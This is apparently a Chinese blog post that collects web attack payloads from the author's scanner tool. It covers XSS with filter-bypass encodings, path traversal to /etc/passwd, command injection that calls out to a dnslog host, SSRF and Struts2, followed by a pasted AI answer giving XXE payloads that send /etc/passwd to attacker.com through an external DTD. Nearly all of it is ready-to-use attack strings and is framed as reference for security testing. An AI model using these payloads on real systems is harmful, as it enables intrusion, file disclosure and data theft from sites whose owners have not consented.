WEB漏洞测试payload整理

本文整理了常用的Web漏洞测试Payload,包括XSS、命令执行、SSRF等漏洞的测试代码,适用于不同类型的Web应用安全测试场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。

[反射型xss]

[在html形成]

" '><script>document.title="[random]";</script>
<script>document.title="[random]";</script>
<svg onload=document.title="[random]";>

[在js形成]

document.title="[random]";//
;document.title="[random]";//
";document.title="[random]";
';document.title="[random]";
");document.title="[random]";
');document.title="[random]";

[在html属性形成(img)]

888" onload=document.title="[random]" a="
888' onload=document.title="[random]" a='
888 onload=document.title="[random]" 

[存储型xss]
[通用payload]
测试环境,需要在触发的地方查看payload显示情况

<script>alert(/StoredXssByScriptTag/);</script>
"'><script>alert(/StoredXssByScriptTagBypass);</script>
[Bypass on Event] [事件型绕过]
<img src=1 onerror=alert(/StoredXssByImgTag/)>  #一般富文本不会过滤img标签
[Bypass pseudo protocol] [伪协议绕过]
<iframe src=javascript:prompt(/StoredXssByIframeTag/);></iframe>
<object data=data:text/html;base64,PHNjcmlwdD5wcm9tcHQoL1N0b3JlZFhzc0J5T2JqZWN0VGFnLyk7PC9zY3JpcHQ+></object>
[Bypass html5 tag] [html5标签绕过]
<svg onload=prompt(/StoredXssBySvgTag/)>
<embed src=javascript:alert(/StoredXssByEmbedTag/);>
[Bypass html or js encode] [js编码,html编码,十进制编码绕过等]
<embed src=javas&#99;r&#105;pt:alert(/StoredXssByEmbedTagAndHtmlEncode/);>
<video><source onerror=alert(String.fromCharCode(47,83,116,111,114,101,100,88,115,115,98,121,86,105,100,101,111,84,97,103,65,110,100,83,116,114,105,110,103,69,110,99,111,100,101,47))>
<script/src=data:text/j\141v\141script,\u0061%6C%65%72%74(/StoredXssbyScriptTagAndJSEncode/)></script>
如果进行盲测可以根据xss平台地址替换相应的js触发代码
"><script src=http://myxss.net/xxxxxx></script>

[静态文件读取]
[常规检测]

/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/hosts     
/../../../../../../../C:/Windows/system.ini [windows]


[伪造绕过]

/././././././././././././././././././././././././../../../../../../../../etc/passwd      
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd     
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts 


[后缀绕过]

/../../../../../../../../../../../etc/passwd#
/../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../etc/passwd#.jpg
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd#.html
/../../../../../../../../../../../etc/passwd%00.html
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.jpg
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.html
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html


[命令执行漏洞]


[常规检测]

;curl [random].test.dnslog.link
 | curl [random].test.dnslog.link
 | ping -n 2 [random].test.dnslog.link [Windows]
 | ping -c 2 [random].test.dnslog.link  [Linux]


[绕过检测]

;curl [random].test.dnslog.link#
 | curl [random].test.dnslog.link#
%20|%20curl%20[random].test.dnslog.link
%20|%20curl%20[random].test.dnslog.link#
%20|%20ping%20-n%202%20[random].test.dnslog.link
%20|%20ping%20-c%202%20[random].test.dnslog.link#
a=p;b=ing;c=c;d=2;$a$b -$c $d [random].test.dnslog.link
a=c;b=url;$a$b [random].test.dnslog.link#
${IFS}|${IFS}curl${IFS}[random].test.dnslog.link
${IFS}|${IFS}ping${IFS}-c${IFS}2${IFS}[random].test.dnslog.link
a=p;b=ing;c=c;d=2;$a$b{IFS}-$c{IFS}$d{IFS}[random].test.dnslog.link
a=c;b=url;$a$b{IFS}[random].test.dnslog.link#


[ssrf漏洞]

http://[random].test.dnslog.link/


[strust2命令执行]

?redirect:http://[random].test.dnslog.link/%25{3*4}

<think>好的,用户需要关于Web应用中XXE漏洞的测试示例、示例代码和检测方法。首先,我要回忆一下XXE的基本概念和常见利用方式。根据提供的引用内容,XXE漏洞主要是因为XML解析器未禁用外部实体引用,导致攻击者可以读取文件、执行命令等。 用户需要具体的测试实例和示例代码,所以我需要整理几个典型的场景,比如有回显和无回显的情况。对于有回显的情况,通常可以通过直接注入外部实体来读取系统文件,比如/etc/passwd。示例代码可能包括构造带有外部实体的XML,并展示如何通过服务器响应获取数据。 然后是检测方法,用户可能需要知道如何手动测试或者使用工具。手动检测可以通过修改Content-Type为XML,或者尝试插入实体声明。工具方面,比如Burp Suite的Scanner或者OWASP ZAP可以自动检测,但手动验证也很重要。 另外,用户可能对不同的编程环境感兴趣,比如PHP和Java。根据引用内容,虽然示例用PHP环境,但漏洞利用与语言无关,所以需要说明这一点。可能需要提到PHP的示例代码,如引用3中的靶场,以及Java中的常见配置问题,比如禁用DTD。 还需要考虑无回显的情况,这时候可能需要使用参数实体和外部服务器来捕获数据。比如通过DNS查询或HTTP请求将数据外带。示例代码需要展示如何构造OOB(带外)攻击的XML。 检测方法部分,要分步骤说明,比如检查XML解析配置、测试实体注入、监控外部请求等。同时,引用中的信息,如引用4提到的危害,可以强调检测的重要性。 最后,生成相关问题时要围绕用户可能的后续疑问,比如漏洞修复、不同语言的差异、自动化工具等。确保问题覆盖用户可能深入的方向。 需要确保回答中的示例代码正确使用$...$和$$...$$格式,并遵循LaTeX语法。同时,引用标识要正确对应,比如引用1、2、3、4的位置是否准确。 现在整理结构:先介绍XXE漏洞,然后分有回显和无回显的测试示例,给出代码片段,接着说明检测方法,最后相关问题。需要确保每个部分都有引用支持,比如引用4中的基础知识,引用2中的Java环境说明,引用3中的靶场示例。 检查是否有遗漏点,比如PHP和Java的处理差异,虽然利用相同但配置不同,可能需要提到。另外,检测方法中的工具和手动步骤都要涵盖。确保回答清晰,步骤详细,用户能按照指导进行测试。</think>### Web应用XXE漏洞测试示例与检测方法 --- #### 一、XXE漏洞测试实例 1. **有回显的XXE利用(文件读取)** 构造包含外部实体的XML请求,尝试读取服务器文件(如`/etc/passwd`): ```xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <user> <name>&xxe;</name> </user> ``` - **触发场景**:若服务器返回内容中包含文件内容,则存在漏洞[^4]。 - **示例靶场**:访问`http://127.0.0.1/xxe-lab/php_xxe/`(PHP环境)并提交上述Payload[^3]。 2. **无回显的XXE利用(带外数据外传)** 通过参数实体和外部服务器接收数据: ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd; ]> <user></user> ``` - **外部DTD文件(evil.dtd)**: ```xml <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % oob "<!ENTITY % exfil SYSTEM 'http://attacker.com/?data=%file;'>"> %oob; %exfil; ``` - **检测方法**:监控攻击者服务器的访问日志,查看是否收到文件内容[^2]。 --- #### 二、示例代码(PHP靶场) 假设目标接口接收XML输入: ```php // 漏洞代码示例(未禁用外部实体) $xml = file_get_contents('php://input'); $dom = new DOMDocument(); $dom->loadXML($xml); echo $dom->getElementsByTagName('name')->item(0)->nodeValue; ``` **测试Payload**: ```http POST /vuln_endpoint HTTP/1.1 Content-Type: application/xml <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <user><name>&xxe;</name></user> ``` --- #### 三、检测方法 1. **手动检测** - **步骤1**:修改请求的`Content-Type`为`application/xml`,插入实体声明。 - **步骤2**:尝试读取系统文件或触发DNS/HTTP请求(如`file:///etc/passwd`或`http://attacker.com`)。 - **步骤3**:观察响应是否包含文件内容或外部服务器是否收到请求[^1]。 2. **工具检测** - **Burp Suite**:使用`Scanner`模块自动检测XXE漏洞。 - **OWASP ZAP**:通过主动扫描识别XML解析风险。 - **XXEinjector**:自动化工具,支持带外数据测试。 3. **配置检查** - 禁用XML解析器的外部实体(如PHP中设置`libxml_disable_entity_loader(true)`)。 - 使用白名单验证输入数据格式。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值